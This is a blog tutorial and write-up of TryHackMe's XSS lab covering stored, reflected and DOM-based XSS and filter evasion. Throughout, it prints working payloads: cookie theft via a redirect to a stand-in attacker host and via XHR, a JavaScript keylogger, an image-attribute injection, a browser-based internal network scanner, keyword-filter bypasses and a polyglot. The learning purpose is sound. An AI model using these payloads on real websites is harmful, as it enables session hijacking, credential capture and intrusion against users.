A guide to XSS

2021-06-29

A guide to XSS

So this post will be going over quite a lot - but it's all practical ! And I hope you can use these skills whenever the case arises that a website hasn't done the work to protect themselves. All within the legal confines of course...

XSS is a plague that can hit a website from various points. It can be a problem with their API for example, so the definition of resources and pages into URLs like https://my-website.com/admin/?account=document.cookie where we take the cookie that is part of a session and use it to login. The problem is that this cookie can be captured by other attackers and if this were to be sent as a link to the rightful owner , then we could attach scripts to this URL and have them install or perform all kinds of things. It is something we have to keep watch for with every web form, and they need to sanitise input correctly otherwise an attacker could get the server to execute those scripts, or worse would be that those scripts are stored on the webserver, and handed out to every user... Such a thing can happen with a comment section of a website , you make a comment which has a script embedded , either as a function which sends the document.cookie of each user who sees it towards the attacker's IP address, or in the comment itself we have a malicious hyperlink.

Ideally we would just ban JavaScript but there are far too many uses for it,and nowadays there is good support natively , without the need to use TypeScript or other type-checkers.

We shall go over the simplest, and most dangerous XSS attack first, which is the stored XSS attack. This often happens when a website allows user input that is not sanitised (removes special characters, doesn't escape characters which may be keywords in our language etc) when inserted into the database.

Usually such a script is of a style where it wants to grab the local document.cookie and issues a GET request to the attacker's IP , which will of course not return anything meaningful, but the end result being the attacker could hijack our session and ruin our lives ... Every time someone visits that site, the "comment", "username" or whatever the attacker used will be executed and the user will be faced with that content without even clicking on anything as it has become as intrinsic to the rest of the website as the content itself.

I'll be using TryHackMe's XSS box as a teaching resource, and you can consider this part of the article to be a writeup - as we explore all the major topics - but with a few notes at the end.

Stored XSS Attacks

So , load up the box and you should see :

xss-homepage

Now I got super confused at this point, as I didn't read the You need to login to continue, I just started trying to run scripts in the username fields... But yes register an account first and we'll start the first challenge.

stored-xss-start

As I mentioned earlier, stored XSS is easiest on the more social platforms, which feeds need to be shown, comments etc. Our first mission is to become familiar with injecting HTML into websites, and all we have to do is "exploit" the comment box to achieve this...

After trying <h1>It worked</h1> we see our code spring up:

stored-level-one

Now if we log out, or use another account this feed shall be shown and that is an implicit reminder that the server will re-render the feed, and any scripts we put in. Level two is quite simple too, all we need to do is run an alert() and show our document.cookie and we're there.

store-level-two

We'll see an alert pop up of course, showing our cookie - but you'll also get the alert of the website which shows you that alert("W3LL_D0N3_LVL2"). And you can bet that will never stop popping up for each comment ...

You might be thinking by this point , but why in the hell does the browser become so stupid so as to allow this sort of thing? Surely it knows that what has been inputted is JavaScript and not an ordinary string ? Well, if we look at how ubiquitous JavaScript is in a frontend , and how HTML itself will have elements like this <a onmouseover="alert('this is mad')">Some text</a> and this is to due with the JS attaching itself to genuine HTML attributes. So then we ask why would a browser accept HTML , if the characters aren't escaped , so that we render "<h1>No large text</h1>" then the site is much safer as we don't have the browser interpreter evaluate tags, but strings instead.

Now let's mess around with the site, and we can run this script

<script>
var header = document.getElementById("thm-title"); header.innerHTML = "I am a hacker"</script>

This will deface the site each time the comment section is loaded, but at least we see we're rewarded for the effort haha

stored-level-three

On the right hand side you'll see the answer displayed, but the I wanted you to see that the scripts themselves are preserved, even if you don't see them.

Now then, onto the next task which is to steal someone's cookie! There are a few sneaky ways of doing this using a client's document.cookie , but in this tutorial they forgive you for using the incredibly blunt

<script>window.location='http://attacker-ip/?cookie='+document.cookie</script>

Which will redirect a user to a blank page, and the attacker will see the cookie in the URL. In this learning playground though there is also a /logs page which is quite nice, so we can post the cookie there. In the real world this may just be a POST request sent to an attacker's server, it could also be concatenated to an attacker's account , and it pops under the profile name for example...

Here is the script I'm going to use to get any and all cookies:

<script>
let cookie = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("GET", "/log/" + cookie);
xhr.send();
</script>

And whenever Jack decides to log in and view the comments section that script shall execute. After I've pulled the cookie I can swap the value in at the cookies page like so in the browser:

cookie-stealing

And you can see here that we successfully sent a message as Jack...

Utilising a keylogger script alongside stored-XSS

JavaScript can be used for many things, including creating an event to listen for key presses.

<script type="text/javascript">
let l = ""; 
document.onkeypress = function (e) {
l += e.key; 
console.log(l);
}
</script>

Now let's take this script and add it as a comment and wreak some havoc ! Remember, if we logged all the output to console, then the client would get all the code going to their console, for the sake of learning and not introducing too many hurdles, there is a /logs page that we can add our keylogged data to.

The reflected XSS attack

With this type of mini-script we will need the user to be actively involved this time, clicking on links which will have the web sever execute the accompanying script, embedded in a query, or even calling a rogue server to execute a more sophisticated script...

Often times you will see link shorteners in use, which can be used by attackers to fake spoof websites and they could take someone to "Facebook" , they enter their credentials, and if we're good we could redirect them to the actual Facebook, with those same details, and they're logged in completely unaware of the MITM.

When we inputs get executed through the URLs, we don't always need client interaction, we can definitely get away with just putting the script within a field , and that field data gets pushed into the URL and the webserver executes it. Below is what happens when no sanitisation is done by the client or the server.

reflected-xss-one

And the second task is much the same, just crafting an alert that has window.location.host instead...

The DOM-based XSS attack

This one is at times the best choice and the absolute worst. It has so much power in the sense that it utilises the website's own procedures, and being that it always executes on our computer there is no chance of a server being able to stand in and defend itself. We utilise on vulnerable website functionality, a lack of care that allows us to inject scripts where they really shouldn't be. Remember when I was talking about stored-XSS and how the server may choose to store things we give it, well this can also be the case here, as we can get around standard sanitisation tricks and instead of uploading an image to our profile, we could upload a script for example.

That's sort of what we shall be doing here, our first task is to see whether or not we can add some functionality to the <img> tag , maybe an onmouseover with some alerts maybe? So whoever hovers our profile would run a keylogger for the rest of their session? Brutal...

dom-level-one

On the right we can see the tag being constructed and our supposed URL added in the middle, but we can do is

imgEl.innerHTML = '<img src="' + imgURL + '" alt="Image not found.." width=400>'

we can see that if we end the URL prematurely with something like https://somelink.com" (making sure to add that last double quote for src=") then we have the rest of the imgURL to add attributes to. But we can also see that the beginning of alt has a double-quote , so when we have our onmouseover=alert("something") we need to include our own double-quote just after = . So we should end up with this:

imgEl.innerHTML = '<img src="' + whatever" onmouseover="alert(document.cookie) + '" alt="Image not found.." width=400>'

What's important to remember is that the input we enter will be converted to a string, so it looks weird here, but whatever won't be treated as a variable, and after our new attribute addition, the single quote of '" introduces the string, and the double-quote was meant to close off our URL, but we're using it to close off our attribute.

And that worked out! Try it , and we can check the console to see if the innerHTML of the img tag looks good:

correct-dom-level-one

Next up we need to do a similar trick, but when we hover over the img tag we need to change the background colour of the website to red.

Port scanning trickery

On the application layer your browser has no notion of internal and external IP addresses. So any website is able to tell your browser to request a resource from your internal network.

For example, a website could try to find if your router has a web interface at 192.168.0.1 by:

<img src="http://192.168.0.1/favicon.ico" onload="alert('Found')" onerror="alert('Not found')">

Please keep in mind this is a proof of concept and there are many factors that will effect results such as response times, firewall rules, cross origin policies and more. Our browsers can conduct a basic network scan and infer about existing IP's, hostnames and services. As this is a learning exercise assume the factors do not apply here.

The following script will scan an internal network in the range 192.168.0.0 to 192.168.0.255

<script>
for (let i = 0; i < 256; i++) { 
let ip = '192.168.0.' + i
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code
}
</script>

After you've found an valid IP you can then use the same method above and include a port number. However, the method described here only works with web servers (as its looking for the favicon image). A more detailed port scanner can be found here. As previously stated, this page is a proof of concept, you can create scripts which have much more capability.

Filter Evasion

So for us to even be messing around with scripts and eval we assume that the website is blacklisting particular keywords, or it may just be that the website hasn't even considered security. Most often times in the real world things are whitelisted, but you may get functionality on the DOM, or there may be functionality in things like image upload which haven't been battle hardened - hence we can do reverse shells, stored-XSS etc.

For this section of the playground, for each level, we have to use the input field supplied to generate a alert("hello") , zipping past any defences.

Task one has the filter that removes all script tags, so we have to do a DOM-based XSS, as reflective and stored involve server-side processing, but we're happy with just getting an alert done on our end. Going back to the DOM section we know that we can invoke the event by using tags and doing an onmouseover.

So it can literally be as simple as this:

<a onmouseover="alert('Hello')">This worked...</a>

Next , we have a filter which bans the use of alert. No matter, the real problem is we have too many options to choose from. We could just be childish and not even place the game by just replacing our last answer with either prompt or confirm instead but that's boring. Another way of doing it would be to replace the words alert with the equivalent string character codes, and then adding them all up to make the syntax alert("Hello") like this:

If eval isn't filtered then we can replace the actual letters of the function with their respective character codes like so:

eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))
// returns eval(alert(1))
// alerts 1

Another way is to do simple encoding/decoding rules, transpositions etc.

Task three has the filter that we cannot use the word hello, but my sidenote above gives us a clue as to how we can get round this.

Side note, this level is so easy I accidentally inputted the thing from challenge one as a test - which I meant to replace with the String.fromCharCode stuff, and even though it replaced the data it still worked...

<a onmouseover="alert('Hello')">This worked</a>

The filter just removes the word and it still comes out good, but a better way would be to do

<a onmouseover="alert('HHelloello')">This worked</a>

Even though the String.fromCharCode returns the right value, it doesn't seem to be rewarded, but if you look at the client-side validation then you can start to see why:

requirements

For question three, it just does a replacement , so if we include a Hello for it remove, then we allow other - fragmented - Hello's to pass too. For task four we can see that there is quite a lot to remove, but it looks at attributes, not the text itself, which is another easy thing to dodge, as it doesn't watch for things like ONMOUSEOVER etc.

<a ONMOUSEOVER="alert('HHelloello')">This worked</a>

Protection Methods and other exploits

Assuming that the website is operating on a blacklist gives us a lot of freedom , and whatever it takes to bypass controls we shall do. Things called polyglots are thing which test whether alerts etc pop up as they check multiple security areas, example polyglots:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

There are also entire frameworks who try their best to break the client, the BeEF framework being most notable.